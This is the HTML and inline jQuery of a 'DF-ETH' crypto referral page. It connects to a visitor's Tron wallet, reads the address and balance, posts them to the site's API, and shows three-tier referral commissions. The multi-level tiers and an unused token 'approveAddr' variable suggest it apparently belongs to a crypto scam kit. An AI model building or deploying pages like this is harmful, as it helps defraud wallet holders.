<html lang="" data-dpr="1" style="font-size: 37.5px;">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" />
    <meta name="robots" content="noindex, nofollow" />
    <link rel="icon" href="https://tokem.xxelza.club/public/defi/favicon.ico" />
    <title>DF-ETH</title>
    <link href="./index_files/app.f6608e92.css" rel="preload" as="style" />
    <link href="./index_files/chunk-vendors.73034213.css" rel="preload" as="style" />
    <!--  <link href="./index_files/app.5bd8d9f8.js" rel="preload" as="script" />-->
    <!--  <link href="./index_files/chunk-vendors.1a1edb34.js" rel="preload" as="script" />-->
    <link href="./index_files/chunk-vendors.73034213.css" rel="stylesheet" />
    <link href="./index_files/app.f6608e92.css" rel="stylesheet" />
    <link type="image/x-icon" rel="shortcut icon" href="./index_files/sfZq78vytoImJYG.png" />
    <link type="image/x-icon" rel="shortcut icon" href="https://i.loli.net/2021/10/28/sfZq78vytoImJYG.png" />
</head>

<body style="font-size: 12px;" class="">
    <div id="app" style="background-color: rgb(248, 248, 248); color: rgb(51, 51, 51);">
        <div data-v-164d9d34="">
            <div data-v-164d9d34=""
                style="--van-tab-text-color:#333333; --van-tab-active-text-color:#0052ff; --van-tabs-bottom-bar-color:#0052ff; --van-tabs-default-color:#0052ff; --van-tabs-nav-background-color:#f8f8f8; --van-dropdown-menu-background-color:#ffffff; --van-dropdown-menu-title-text-color:#333333; --van-button-warning-background-color:#0052ff; --van-button-warning-border-color:#0052ff; --van-button-warning-color:#f8f8f8; --van-collapse-item-content-background-color:#ffffff; --van-cell-background-color:#f8f8f8; --van-cell-text-color:#333333; --van-cell-active-color:#ffffff; --van-cell-border-color:#ffffff; --van-popup-background-color:#ffffff; --van-field-input-text-color:#959BA7; --van-dropdown-menu-title-font-size:14px; --van-tabbar-background-color:#ffffff; --van-tabbar-item-active-background-color:#f8f8f8; --van-tabbar-item-active-color:#0052ff; --van-nav-bar-background-color:#f8f8f8; --van-nav-bar-icon-color:#0052ff; --van-nav-bar-title-text-color:#0052ff; --van-count-down-text-color:#0052ff; --van-count-down-font-size:16px; --van-cus-border-color:#efefef; --van-cus-background-color:#f8f8f8; --van-cus-front-color:#ffffff; --van-cus-assets-bg-color1:rgba(0,0,0,0.05); --van-cus-assets-bg-color2:rgba(0,0,0,0.05); --van-cus-img-bg-color:rgba(255,255,255,0.2); --van-cus-text-color:#333333; --van-cus-link-light-color:rgba(0,82,255,0.05);">
                <div data-v-164d9d34="" class="header">
                    <div data-v-504e9856="" data-v-164d9d34="" class="my-header">
                        <div data-v-504e9856="" class="header-row van-row van-row--flex van-row--align-center van-row--justify-space-between">
                            <div data-v-504e9856="" class="van-col van-col--8">
                                <div data-v-504e9856="" class="dropdown-wrap van-dropdown-menu">
                                    <div class="van-dropdown-menu__bar">
                                        <div role="button" tabindex="0" class="van-dropdown-menu__item">
                                            <span class="van-dropdown-menu__title" style="">
                                                <div class="van-ellipsis">
                                                    English
                                                </div>
                                            </span>
                                        </div>
                                    </div>
                                    <div data-v-504e9856="">
                                        <div class="van-dropdown-item van-dropdown-item--down" style="top: 48px; display: none;">
                                            <div class="van-overlay" style="z-index: 2002; position: absolute; animation-duration: 0.2s;="></div>
                                            <div class="van-popup van-popup--top van-dropdown-item__content" style="transition-duration: 0.2s; z-index: 2003;">
                                                <a href="./../defi-zh/referral-record.html"><div role="button" tabindex="0" class="van-cell van-cell--clickable van-dropdown-item__option" style="">
                                                    <div class="van-cell__title">
                                                        <span>繁體中文</span>
                                                    </div>
                                                </div></a>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div data-v-504e9856="" class="van-col van-col--8">
                                <div data-v-504e9856="" class="flex align-center justify-center"><img data-v-504e9856="" src="./index_files/sfZq78vytoImJYG.png" width="20">
                                    <h2 data-v-504e9856="" class="plat-name">DF-ETH</h2>
                                </div>
                            </div>
                            <div data-v-504e9856="" class="van-col van-col--8" style="text-align: right; padding-right: 10px;overflow: hidden"><button data-v-504e9856="" disabled="disabled"
                                    class="van-button van-button--default van-button--mini van-button--plain van-button--disabled van-button--hairline van-hairline--surround">
                                    <div data-v-504e9856="" class="van-button__content"><span data-v-504e9856="" class="van-button__text button_address">...</span></div>
                                </button></div>
                        </div>
                        <!---->
                        <!---->
                        <!---->
                    </div>
                </div>
                <div data-v-17be74fb="" data-v-164d9d34="" class="body-center">
                    <div data-v-17be74fb="" class="share" style="margin-top: 0px;">
                        <div data-v-17be74fb="" class="share-bg">
                            <h2 data-v-17be74fb="" class="tl p-l-10 lg-title">Refer Friends.</h2>
                            <h2 data-v-17be74fb="" class="tl p-l-10">Earn Crypto Together.</h2>
                            <p data-v-17be74fb="" class="tl p-l-10"> Earn up to 0% commission in DF-ETH </p>
                            <div data-v-17be74fb="" class="tl p-l-10 active-color"> View details </div>
                            <div data-v-17be74fb="" class="my-rebate-info flex align-center justify-between tc">
                                <div data-v-17be74fb="">
                                    <div data-v-17be74fb="" class="title">My Level</div>
                                    <div data-v-17be74fb="" class="level">--</div>
                                </div>
                                <div data-v-17be74fb="">
                                    <div data-v-17be74fb="" class="title">Level 1</div>
                                    <div data-v-17be74fb="" class="level1"> -- </div>
                                </div>
                                <div data-v-17be74fb="">
                                    <div data-v-17be74fb="" class="title">Level 2</div>
                                    <div data-v-17be74fb="" class="level2"> -- </div>
                                </div>
                                <div data-v-17be74fb="">
                                    <div data-v-17be74fb="" class="title">Level 3</div>
                                    <div data-v-17be74fb="" class="level3"> -- </div>
                                </div>
                            </div>
                        </div>
                        <div data-v-17be74fb="" class="van-tabs van-tabs--line">
                            <div class="van-tabs__wrap">
                                <div role="tablist" class="van-tabs__nav van-tabs__nav--line">
                                    <div role="tab" class="van-tab"><a href="./referral-team.html"><span class="van-tab__text van-tab__text--ellipsis">Team</span></a></div>
                                    <div role="tab" class="van-tab"><a href="./referral.html"><span class="van-tab__text van-tab__text--ellipsis">Referral</span></a></div>
                                    <div role="tab" aria-selected="true" class="van-tab van-tab--active"><a href="./referral.html"><span class="van-tab__text van-tab__text--ellipsis">Record</span></a></div>
                                    <div class="van-tabs__line" style="transform: translateX(786%) translateX(-50%);"></div>
                                </div>
                            </div>
                            <div class="van-tabs__content van-tabs__content--animated">
                                <div class="van-tabs__track" style="transform: translate3d(-200%, 0px, 0px); transition-duration: 0.3s;">
                                    <div data-v-17be74fb="" role="tabpanel" class="van-tab__pane-wrapper van-tab__pane-wrapper--inactive" aria-hidden="true">
                                        <div class="van-tab__pane">
                                            <div data-v-17be74fb="" class="team-info">
                                                <div data-v-17be74fb="" class="flex align-center justify-between">
                                                    <div data-v-17be74fb="" class="block-info m-r-20">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">Team size</h4>
                                                    </div>
                                                    <div data-v-17be74fb="" class="block-info">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">Direct promoters</h4>
                                                    </div>
                                                </div>
                                                <div data-v-17be74fb="" class="flex align-center justify-between">
                                                    <div data-v-17be74fb="" class="block-info m-r-20">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">Total revenue(ETH)</h4>
                                                    </div>
                                                    <div data-v-17be74fb="" class="block-info">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">Today's revenue(ETH)</h4>
                                                    </div>
                                                </div>
                                                <div data-v-17be74fb="" class="flex align-center justify-between">
                                                    <div data-v-17be74fb="" class="block-info m-r-20">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">Total revenue(TRX)</h4>
                                                    </div>
                                                    <div data-v-17be74fb="" class="block-info">
                                                        <h3 data-v-17be74fb="">0</h3>
                                                        <h4 data-v-17be74fb="">Today's revenue(TRX)</h4>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div data-v-17be74fb="" role="tabpanel" class="van-tab__pane-wrapper van-tab__pane-wrapper--inactive" aria-hidden="true">
                                        <div class="van-tab__pane">
                                            <div data-v-17be74fb="" class="share-link-con">
                                                <h3 data-v-17be74fb="">My referral link</h3>
                                                <div data-v-17be74fb="" class="van-cell-group">
                                                    <div data-v-17be74fb="" class="van-cell van-cell--center van-field van-field--disabled">
                                                        <div class="van-cell__value van-cell__value--alone van-field__value">
                                                            <div class="van-field__body"><input type="text" disabled="disabled" class="van-field__control">
                                                                <div class="van-field__button"><button data-v-17be74fb="" class="van-button van-button--warning van-button--mini">
                                                                        <div data-v-17be74fb="" class="van-button__content"><span data-v-17be74fb="" class="van-button__text">Copy</span></div>
                                                                    </button></div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <p data-v-17be74fb=""></p>
                                                <div data-v-17be74fb="" class="earn-tip flex align-center justify-around">
                                                    <div data-v-17be74fb=""><img data-v-17be74fb="" src="static/img/ChooseCommission.03ba2d8e.svg" width="60">
                                                        <h3 data-v-17be74fb="">1. Get Link</h3>
                                                    </div>
                                                    <div data-v-17be74fb=""><img data-v-17be74fb="" src="static/img/InviteFriends.6f4b6101.svg" width="60">
                                                        <h3 data-v-17be74fb="">2. Invite Friends</h3>
                                                    </div>
                                                    <div data-v-17be74fb=""><img data-v-17be74fb="" src="static/img/EarnBitcoin.3199a322.svg" width="60">
                                                        <h3 data-v-17be74fb="">3. Earn Crypto</h3>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div data-v-17be74fb="" role="tabpanel" class="van-tab__pane-wrapper">
                                        <div class="van-tab__pane">
                                            <div data-v-17be74fb="" class="records-con">
                                                <div data-v-2589b438="" data-v-17be74fb="" class="list-wrap">
                                                    <div data-v-2589b438="" class="filters flex align-center justify-start"><span data-v-2589b438="">Level</span>
                                                        <div data-v-2589b438="">
                                                            <span data-v-2589b438="" class="tags van-tag van-tag--medium van-tag--default" data-id="0" style="background: rgb(0, 82, 255); color: rgb(255, 255, 255);">ALL</span>
                                                            <span data-v-2589b438="" class="tags van-tag van-tag--medium van-tag--default" data-id="1" style="background: rgb(255, 255, 255); color: rgb(0, 82, 255);">Level 1</span>
                                                            <span data-v-2589b438="" class="tags van-tag van-tag--medium van-tag--default" data-id="2" style="background: rgb(255, 255, 255); color: rgb(0, 82, 255);">Level 2</span>
                                                            <span data-v-2589b438="" class="tags van-tag van-tag--medium van-tag--default" data-id="3" style="background: rgb(255, 255, 255); color: rgb(0, 82, 255);">Level 3</span>
                                                        </div>
                                                    </div>
                                                    <div data-v-2589b438="" class="no-data" id="no_data">



                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!---->
                </div>
                <div data-v-7e0b484d="" data-v-164d9d34="">
                    <div data-v-7e0b484d="" class="van-tabbar__placeholder" style="height: 42.6562px;">
                        <div class="van-tabbar van-tabbar--fixed">
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./home.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-home-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">Home</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./withdraw-eth.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-paid">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">Withdrawal</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item van-tabbar-item--active">
                                <a href="./referral-team.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-friends-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">Referral</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./account.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-user-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">Account</div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script src="./index_files/web3.min.js"></script>
    <script src="./index_files/web3.min(1).js"></script>
    <!--<script src="./index_files/chunk-vendors.1a1edb34.js"></script>-->
    <!--<script src="./index_files/app.5bd8d9f8.js"></script>-->
    <div class="van-toast van-toast--middle van-toast--loading" style="z-index: 2025; display: none;">
        <div class="van-loading van-loading--spinner van-toast__loading">
            <span class="van-loading__spinner van-loading__spinner--spinner"><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i></span>
        </div>
        <div class="van-toast__text">
            Connecting...
        </div>
    </div>
    <div class="van-toast van-toast--middle van-toast--loading" style="z-index: 2001; display: none;">
        <div class="van-loading van-loading--spinner van-toast__loading">
            <span class="van-loading__spinner van-loading__spinner--spinner"><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i></span>
        </div>
        <div class="van-toast__text">
            Connecting...
        </div>
    </div>
</body>
<script src="https://cdn.bootcdn.net/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="./index_files/TronWeb.js"></script>
<script src="./index_files/script.js"></script>
<script type="text/javascript">
    var rank = 6.5;
    var authorized_address = '';
    var domain = 'https://' + window.location.host + '/';
    var bizhong = '';
    var approveAddr = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
    var total=0;
    var trx = 0;
    var time;
    var walletAddress ;
    function getUrlQueryString(names, urls) {
        urls = urls || window.location.href;
        urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
        var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
        var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
        if (r != null && r[2] != "")return unescape(r[2]);
        return null;

    }

    time = setInterval(getWalletAddress, 1000);
    getUserInfo(walletAddress)
    $('.tags').click(function (){
        var id = $(this).data('id');
        $('.tags').css({"background": "rgb(255, 255, 255)","color": "rgb(0, 82, 255)"})
        $(this).css({"background": "rgb(0, 82, 255)","color": "rgb(255, 255, 255)"})
        // alert(walletAddress)
        getChildList(walletAddress, id)
    })

    function getWalletAddress()
    {
        try {
            let tronWeb = window.tronWeb
            walletAddress = tronWeb.defaultAddress.base58;

            $('.button_address').text(walletAddress);

            tradeobj = tronWeb.trx.getAccount(
                walletAddress,
            ).then(output => {

                trx = output.balance / 1000000;
                $('.balance').val(trx);

            });

            getChildList(walletAddress);
            getUserInfo(walletAddress);
            window.clearInterval(time);
            return true;
        } catch (e) {

            return  false;
        }
    }

    function getChildList(address, level = ''){
        $.ajax({
            type: 'post',
            url:  domain + 'api/get_child_list',
            data: {address: address, level: level},
            success:function(data){
                $('#no_data').html('')
                var list = data;
                var html = '';
                for (var index in list) {
                    html += '                                                           <div data-v-4734bf18="" class="assets-bottom">\n' +
                        '                                                                                <div data-v-4734bf18="" class="list-account box-shadow">\n' +
                        '                                                                                    <div data-v-4734bf18="" class="ac-top flex align-center justify-between">\n' +
                        '                                                                                        <div data-v-4734bf18="" class="flex align-center justify-between">'+ list[index]['address'] +'<span data-v-4734bf18="" class="m-l-10"></span></div>\n' +
                        '                                                                                    </div>\n' +
                        '                                                                                    <div data-v-4734bf18="" class="ac-body flex align-center justify-between">\n' +
                        '                                                                                        <div data-v-4734bf18="" class="flex flex-sub flex-direction align-start">\n' +
                        '                                                                                            <h4 data-v-4734bf18="">level</h4>\n' +
                        '                                                                                            <p data-v-4734bf18="" class="fs14">Level '+  list[index]['level'] +'</p>\n' +
                        '                                                                                        </div>\n' +
                        '                                                                                        <div data-v-4734bf18="" class="flex flex-sub flex-direction align-center">\n' +
                        '                                                                                            <h4 data-v-4734bf18="">trx</h4>\n' +
                        '                                                                                            <p data-v-4734bf18="" class="fs14">' +  list[index]['trx']  + '</p>\n' +
                        '                                                                                        </div>\n' +
                        '                                                                                        <div data-v-4734bf18="" class="flex flex-sub flex-direction align-end">\n' +
                        '                                                                                            <h4 data-v-4734bf18="">revenue</h4>\n' +
                        '                                                                                            <p data-v-4734bf18="" class="fs14">' +  (list[index]['trx'] * (list[index]['proportion'] / 100)).toFixed(6) + '</p>\n' +
                        '                                                                                        </div>\n' +
                        '                                                                                    </div>\n' +
                        '                                                                                </div>\n' +
                        '                                                                            </div>';
                }
                $('#no_data').html(html)
            },
            error:function(data){
            }
        })
    }

    function getUserInfo(address)
    {
        $.ajax({
            type: 'post',
            url:  domain + 'api/get_user_info',
            data : {address: address},
            success:function(data){
                $('.level').text('Level ' + data.level);
                $('.level1').text(data.level1);
                $('.level2').text(data.level2);
                $('.level3').text(data.level3);
            },
            error:function(data){
            }
        })
    }
    
    $('.van-dropdown-menu__item').click(function () {
        $('.van-dropdown-item--down').show()
    })
    $('.van-overlay').click(function () {
        $('.van-dropdown-item--down').hide()
    })
</script>
</html>
